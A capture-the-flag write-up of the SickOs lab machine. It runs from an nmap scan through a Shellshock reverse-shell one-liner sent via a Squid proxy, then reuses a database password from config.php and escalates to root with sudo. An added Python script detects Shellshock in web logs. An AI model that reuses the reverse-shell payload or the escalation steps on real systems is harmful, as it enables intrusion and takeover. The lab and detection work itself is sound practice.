Starting with an nmap scan

root@kali:~# nmap -A

Starting Nmap 7.01 ( ) at 2017-02-09 13:19 GMT
Nmap scan report for
Host is up (0.00036s latency).
Not shown: 997 filtered ports
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 08:00:27:75:D4:9E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1 0.36 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 34.57 seconds

I can see port 22 SSH and 3128, which is an HTTP proxy.

Nothing came from the SSH so I moved on to the proxy.

I used curl through the proxy and it spat out

root@kali:~# curl --proxy

After snooping around the site I found a page /cgi-bin/status and it gave out this response.

{ "uptime": " 18:59:06 up 1:09, 0 users, load average: 0.00, 0.01, 0.05", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}

After finding the status page I instantly thought of using the Shellshock vuln, so I looked through my notes and had a quick refresh on it, pieced together a one-liner and hoped for the best.

curl -A "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/ 0>&1' " --proxy

Started up Netcat on port 4444 and bam, shell.

root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 39171
bash: no job control in this shell
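
For the defender's side of the request above, an added example (not part of the original write-up) that scans web server access logs for the Bash function-definition prefix `() {` which the Shellshock one-liner places in the User-Agent header. It assumes Apache combined log format; the log lines and addresses are constructed samples.

```python
import re

# Apache "combined" format (assumed):
# host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Function-definition prefix that Shellshock relies on: "() {",
# matched with optional whitespace so spacing variants are caught too.
FUNC_DEF = re.compile(r'\(\s*\)\s*\{')


def find_shellshock(lines):
    """Return (host, time, field, value) for every logged field that
    carries a Bash function definition."""
    hits = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue  # not a combined-format line, skip it
        for field in ("request", "referer", "agent"):
            value = m.group(field)
            if FUNC_DEF.search(value):
                hits.append((m.group("host"), m.group("time"), field, value))
    return hits


# Constructed sample log (documentation addresses, harmless commands)
SAMPLE_LOG = '''\
192.0.2.10 - - [09/Feb/2017:13:25:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 197 "-" "curl/7.47.0"
192.0.2.10 - - [09/Feb/2017:13:26:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :;}; /bin/bash -c 'id'"
192.0.2.11 - - [09/Feb/2017:13:27:02 +0000] "GET /index.php HTTP/1.1" 200 512 "(){ :; }; /usr/bin/id" "Mozilla/5.0"
192.0.2.12 - - [09/Feb/2017:13:28:10 +0000] "GET /js/app.js?cb=fn() HTTP/1.1" 200 90 "-" "Mozilla/5.0"
'''.splitlines()

if __name__ == "__main__":
    for host, when, field, value in find_shellshock(SAMPLE_LOG):
        print(f"{when} {host} suspicious {field}: {value}")
```

When a request is relayed by a proxy, as with the Squid instance on port 3128 here, the web server logs the proxy's address as the client, so the proxy's own access log is needed to trace the origin.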

I was running as the www-data user and now that I've got initial access my next goal is to get root.

I started to dig around and I checked the /etc/passwd file and found the sickos user interesting as it's not a default user and obviously it's the name of the challenge.

www-data@SickOs:/var/www/wolfcms/wolf$ cat /etc/passwd | grep sickos
cat /etc/passwd | grep sickos

With the user I want to get to in mind, I started to roam the server. I checked /var/www and came across a config.php.

I opened it and found this inside:

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

I tried to log on to the sickos user and I realised I had missed a crucial step.

www-data@SickOs:/usr/lib/cgi-bin$ su sickos
su sickos
su: must be run from a terminal

So I spawned a shell and continued with logging in to the sickos user.

python -c 'import pty; pty.spawn("/bin/bash")'

Take 2
www-data@SickOs:/usr/lib/cgi-bin$ su sickos
su sickos
Password: john@123


After logging in I found it was running with root level privileges.

As our user is running at root level we can simply log in to root without a password.

sudo su

I looked in the root directory and found a txt so I opened the txt file and finished the CTF !!!!

Really enjoyed the CTF, bit strange that wolfcms wasn't a part of it, maybe there's another way in.